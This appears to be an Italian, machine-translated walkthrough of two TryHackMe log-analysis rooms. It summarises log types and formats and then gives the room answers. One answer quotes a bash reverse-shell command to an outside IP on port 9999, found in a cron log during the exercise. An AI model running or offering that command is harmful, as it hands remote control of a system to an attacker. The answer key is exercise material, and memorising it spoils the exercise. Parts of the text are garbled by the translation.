Abbiamo trattato un'introduzione alla registrazione in cui abbiamo discusso la logica della creazione dei log e il motivo per cui creiamo i log. I registri vengono creati e generati per tenere traccia delle prestazioni, analizzare gli incidenti di sicurezza e stabilire un modello da cui prevedere eventi futuri. I registri possono essere registri di sistema, registri di applicazioni, registri di sicurezza, registri di controllo, registri di server e registri di database. Il processo di gestione dei log inizia con la raccolta dei log, l'archiviazione in una posizione centrale, l'analisi dei log e quindi l'analisi utilizzando strumenti di analisi dei log e anche SIEM. Questo faceva parte TryHackMe Introduzione ai registri procedura dettagliata che fa parte del tracciato TryHackMe SOC Livello 2.
Questo post copre anche le risposte per Prova le operazioni di registro di HackMe Camera.
Il corso pratico completo sul Penetration Testing delle applicazioni Web
Punti salienti
I file di registro sono registrazioni di eventi salvati in un file in formato elenco. Possono includere tutti i tipi di informazioni sugli eventi accaduti in un determinato momento. Ogni dispositivo sulla rete crea file di registro, fornendoti così una cronologia di ciò che sta accadendo.
I log contengono in genere cinque aree con intestazione. Sono:
- Timestamp: l'ora dell'evento.
- Livello di registro: quanto è grave o importante l'evento.
- Nome utente: chi ha causato l'evento.
- Servizio o applicazione: cosa ha causato l'evento.
- Descrizione dell'evento: cosa è successo.
Tipi di file di registro
Registro eventi
–registra informazioni sull'utilizzo del traffico di rete e tiene traccia dei tentativi di accesso, degli eventi dell'applicazione e dei tentativi di password non riusciti.Registro di sistema
(o syslog): registra gli eventi del sistema operativo, inclusi messaggi di avvio, modifiche del sistema, arresti, errori e avvisi.Registro del server
– contiene una registrazione delle attività in un documento di testo relativo a un server specifico in un periodo di tempo specifico.Modifica registro
– elenca le modifiche apportate a un'applicazione o a un file.Registro della disponibilità
– tiene traccia del tempo di attività, della disponibilità e delle prestazioni del sistema.Autorizzazione e registro degli accessi
– elenca chi sta accedendo ad applicazioni o file.- Registro delle risorse: fornisce informazioni sui problemi di connettività e su eventuali problemi di capacità.
Registri dell'applicazione
Messaggi su applicazioni specifiche, inclusi stato, errori, avvisi, ecc.Registri di controllo
Attività legate alle procedure operative cruciali per la conformità normativa.Registri di sicurezza
Eventi di sicurezza come accessi, modifiche delle autorizzazioni, attività del firewall, ecc.Registri di rete
Traffico di rete, connessioni e altri eventi relativi alla rete.Registri del database
Attività all'interno di un sistema di database, come query e aggiornamenti.Registri del server Web
Richieste elaborate da un server Web, inclusi URL, codici di risposta, ecc.
Risposte in camera | TryHackMe Introduzione ai registri
Come si chiama il tuo collega che ha lasciato una nota sul tuo Desktop?
Perry
Qual è il percorso completo del file di registro suggerito per l'indagine iniziale?
T1566/var/log/gitlab/nginx/access.logT1566
In base all'elenco dei tipi di registro in questa attività, quale tipo di registro viene utilizzato dal file di registro specificato nella nota dell'Attività 2?
registro del server web
In base all'elenco dei formati di registro in questa attività, quale formato di registro viene utilizzato dal file di registro specificato nella nota dell'Attività 2?
combinato
Dopo aver configurato rsyslog per sshd, quale nome utente appare ripetutamente nei log sshd in /var/log/websrv-02/rsyslog_sshd.log, indicando tentativi di accesso non riusciti o forzatura bruta?
stansimon
Qual è l'indirizzo IP di SIEM-02 basato sul file di configurazione rsyslog /etc/rsyslog.d/99-websrv-02-cron.conf, che viene utilizzato per monitorare i messaggi cron?
10.10.10.101
In base ai log generati in /var/log/websrv-02/rsyslog_cron.log, quale comando viene eseguito dall'utente root?
/bin/bash -c “/bin/bash -i >& /dev/tcp/34.253.159.159/9999 0>&1”
In base alla configurazione di logrotate /etc/logrotate.d/99-websrv-02_cron.conf, quante versioni delle vecchie copie dei file di registro compressi verranno conservate?
24
In base alla configurazione di logrotate /etc/logrotate.d/99-websrv-02_cron.conf, qual è la frequenza di rotazione del log?
ogni ora
Quando si accede all'URL del visualizzatore di log per i file di log non elaborati non analizzati, quale errore viene visualizzato "/var/log/websrv-02/rsyslog_cron.log" quando si selezionano i diversi filtri?
nessun campo data
Qual è il processo di standardizzazione dei dati analizzati in un formato più facilmente leggibile e interrogabile?
Normalizzazione
Qual è il processo di consolidamento dei log normalizzati per migliorare l'analisi delle attività relative a uno specifico indirizzo IP?
Arricchimento
Risposte in camera | Prova le operazioni di registro di HackMe
Quale degli scopi di registro indicati sarebbe adatto a misurare il costo dell'utilizzo di un servizio?
Operativo
Quale degli scopi di registro indicati sarebbe adatto per esaminare i registri dell'applicazione per il miglioramento e la stabilità?
Debug
Sei un consulente che lavora per una startup in crescita. In qualità di consulente, hai partecipato a una sessione di pianificazione della configurazione del registro. L'azienda per cui lavori sta lavorando per conformarsi all'elaborazione delle informazioni di pagamento. La serie di domande data è in discussione.
La risposta a quale domanda può essere "quanto menzionato nei requisiti PCI DSS"?
Quanto devi registrare?
La sessione continua e i tuoi compagni di squadra hanno bisogno del tuo aiuto; negozieranno per la registrazione del budget e dei dettagli dell'operazione. Come consulente, devi ricordare loro un punto vitale:
Quali requisiti non sono negoziabili?
requisiti operativi e di sicurezza
Il tuo team sta lavorando su policy per decidere quali log verranno archiviati e quale parte sarà disponibile per l'analisi.
Quale dei principi di registrazione indicati verrebbe implementato e migliorato?
Archiviazione e accessibilità
Il tuo team ha implementato un nuovissimo prodotto di registrazione API. Uno dei membri del team è stato incaricato di raccogliere i registri generati da quel nuovo prodotto. Il membro del team ha segnalato continui errori durante il trasferimento dei registri alla piattaforma di revisione.
In questo caso, quale delle difficoltà indicate si verifica?
Processo e archivio
In qualità di consulente, stai effettuando una valutazione completa del rischio e hai notato che uno dei team di sviluppo ha implementato uno script personalizzato per generare log per un vecchio sistema, che omette le registrazioni in alcune fasi.
Come lo chiameresti? (Errore o pratica?)
Errore
Videoprocedura dettagliata